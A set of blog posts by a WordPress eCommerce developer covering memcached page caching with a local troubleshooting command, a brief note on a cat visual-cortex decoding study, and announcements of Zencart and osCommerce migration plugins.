Using this method I got my page load times to go from 2500ms to 56ms.  One thing to note is that when ever you recycle the memcache server you will need to rebuild your cache.  This is often referred to as warming up the cache.  I’ve created small wget script to spider my sites and cause the cache to get get built quickly so when customers hit the pages they are already cached.

In the future the WP eCommerce is working on optimizing their pages by combining several of the sql queries to reduce the overall calls to the server. In the meant time a lot can be gained by using the method outlines here.

One thing I should also add is make sure that you limit access to your memcached service via firewalls to make sure only your webservers have access to get and set vaules in it.

Trouble Shooting

To verify your memcached server is running and storing items properly from wordpress try the following.

root@vault events]#  echo "stats cachedump 3 100" | nc localhost 11211
ITEM test_15c03fbb2a8143d215b4204a3fec2bc8 [37 b; 1318205585 s]
ITEM test_a0b9d95d725c92d1f886bab92090476d [37 b; 1318205581 s]
ITEM w3tc_ecom-dev.analogrithems.com_1_object_31f40b57771bd6985c9ede7f4d365d81 [10 b; 1318207066 s]
ITEM test_2adea0d314e2e162e5808cf0cf89c93a [37 b; 1318205578 s]
ITEM test_0e9aeb2846e86ee40d7ef87f10983db7 [37 b; 1318205541 s]
ITEM w3tc_ecom-dev.analogrithems.com_1_object_d938afab08d705a5284e70001f04e078 [10 b; 1318207280 s]
ITEM w3tc_ecom-dev.analogrithems.com_object_887ca248c5dc568895f73a2da40408a0 [1 b; 1318207055 s]
ITEM w3tc_ecom-dev.analogrithems.com_1_object_9d8ea174ea710ccf7d1e137da3837713 [1 b; 1318207055 s]
ITEM w3tc_ecom-dev.analogrithems.com_1_object_b490861e41e39835d63036e06aac92ec [1 b; 1318207055 s]
ITEM w3tc_ecom-dev.analogrithems.com_1_object_2c16037bdfdf0b7f39dabc763607beed [1 b; 1318207055 s]
END

Share on Facebook

It’s 2011 and we still don’t have cyborg implants available.  This is a sad state because the technology was being worked on a decade ago.  One of the least know studies was done at UC Berkeley by Garrett Stanley, Fei Li and Yang Dan.  In their experiment they tapped into the lateral geniculate nucleus of a cat.  This is inside the thalamus which is the sensory processing unit of the brain.  They used a linear decoding technique to convert the signals coming from 177 cells into actual images.  Now the image quality is actually dependant off of how many cells you record from.  It’s a lot like a bit rate concept.  The more samples you take, the higher the quality.

Read the original paper Here

Share on Facebook

It official WordPress eCommerce is for every one now.

Update: 3/3/2012 Packages have been updated, ecommerce-feeder is now available via WordPress plugins

I just finished up another Migrate Plugin.  The new plugin allows users of Zencart to migrate to WordPress eCommerce with just a few clicks.  To make things even better, this time around I added support for Order History.  So what all can you do with the Zencart Migrate plugin?

• Migrate Products (With Variant, Price, Size and meta..)
• Migrate User accounts with Password
• Import Zencart Order History *

The Order History is new and very experimental.  At this time it will not import subscriptions or download access from Zencart.  If you need these things contact me directly and I’ll make them happen.

Here are a few screen shots of that the interface looks like.

As you see from the screen shot, it’s a lot like the osCommerce Migrate Plugin.  The big difference is that zencart supports table prefixes.

To use the Zencart Migrate plugin you need to first have the Ecommerce Feeder Plugin Installed.  Then you need to install The Zencart Migrate Plugin. To install a plugin from a zip file login to your dashboard and got to Plugins -> Add New then select Upload from the top tabs.  Select the zip file you just downloaded and click Install Now.  Activate them both and then go to Tools -> Ecommerce Feeder  for there you can put in your database credentials and select the data you wish to import.

As always be sure to back up your WordPress Database before you run the import jobs.  This is really important as you may run it multiple times as doing imports is trial and error processes right now.

Share on Facebook

It’s time for another lovely installment of to get off your old klunky shopping cart and into WP eCommerce.

Share on Facebook

Looking to Migrate osCommerce to WordPress eCommerce?  Now you can,  I’d like to introduce the osCommerce Migrate tool for Wp-e-Commerce.

Once a upon a time you really only had one choice when it came to an opensource php cart and it was called osCommerce.  This worked for many people for a long time.  The problem is that osCommerce stalled and stopped evolving with the rest of the web. Well, now their are lots of new opensource php shopping carts.  One of the best OpenSource shopping carts in my opinion is WordPress e-Commerce.

The osCommerce Migrate plugin is in beta and for the next month it will even be free to all who signup.  After which you will be able to buy the plugin for $30 on the GetShopped website.  Please note, this is for the 2.x version of osCommerce a 3.x version will be out soon.

Features

• Imports products
• Works with products that have Variants/Options/Attributes (I.E. Sizes, Colors or anything else)
• Retains Category relationships
• Copies product image(s)
• Imports Customers
• It even imports the users passwords so no passwords will need to be reset.
• User address information gets copied.

Backup Your Database

Before you use this plugin I most caution you BACKUP YOUR DATABASE NOW!  This is not a joke.  Unless this is a test WordPress site and you don’t care about your site, be sure to backup your database before going any further.  This plugin is beta; You may want to tweak your osCommerce side and run it again; You may loose power when the plugin is running;  Your server might timeout. Their are a lot of things that can gone wrong and if you have a db backup then you can easily recover.  If you have a problem and come to be for support, the very first thing I will ask is do you have a backup?  I take no responsibility if you don’t backup your site and database.

With that said, you should be able to run this plugin multiple times without issue.  Once it imports your products and customers each time it runs after it is really just doing updates.

How does it work?

The new plugin builds off the free Ecommerce Feeder.  So in order to use this plugin you must first install the Ecommerce Feeder plugin (and activate it).  Then install the osCommerce Migrate plugin (and activate it).  When you login to your Dashboard look under the Tools menu eCommerce Feeder .

If you’ve installed and activated the osCommerce Migrate plugin then when you go to the eCommerce Feeder you’ll have a new Source called osCommerce import.

   Select this source and then input your database credentials.  It will also ask you to give it the url to your osCommerce store.  This url should include all the way to your catalog.  For example if your osCommerce is installed in a subdirectory it would look like http://example.com/oscommerce/catalog  If your oscommerce is installed in the root of your site then just give it the root url.    The site url is only needed if you would like the migrate plugin to import your product images.  It even supports multiple product images.

  If no URL is given, no images will be imported.  You’ll also see you need to select the Purpose for this import, you can select Products or Customer Accounts. You must do one at a time.   Depending on how many customers and products you have this processes can take a long time.  In fact in some cases you may need to configure your PHP’s timeout and memory limit to temporarily be higher.

You’ll notice you have two options after you’ve filled out the form.  Save Job and Run Job  If you click save all your settings will be remembered and you can access via the right menu at any time.    If you click run, then sit back because this processes as I stated before can take a while.  When it completes it will tell you how many products/variants or customers accounts where imported or updated.  You have to make sure though that when it’s running you don’t interrupt it.

After you’ve run the import and imported your products and customers you should leave the plugin activated.  This is because the way the Customer import works.  Since passwords are hashed their is no way to decrypt the password ever.  osCommerce doesn’t even actually have the ability to decrypt the password.  In fact each time you login to WordPress or osCommerce the systems actually just rehash your password and compare it to what is stored in the database.

What this plugin does is actually implement the osCommerce password algorithm inside WordPress.  The first time your customer logs into your site it will comparte it against the osCommerce password and if the compare is successful it will rehash your password with the WordPress algorithm.

Wanna be in the beta? Signup below.

Trouble Shooting

The plugin is designed to not time out, but some PHP installs will cause a timeout anyways.  For example if you are using a shared host like Dreamhost you may need to update your users php settings by following these instructions.  I recommend setting the memory limit to 128Mb and timeout to 9999 during the initial import.  Afterwards return the values back to their default value.

Share on Facebook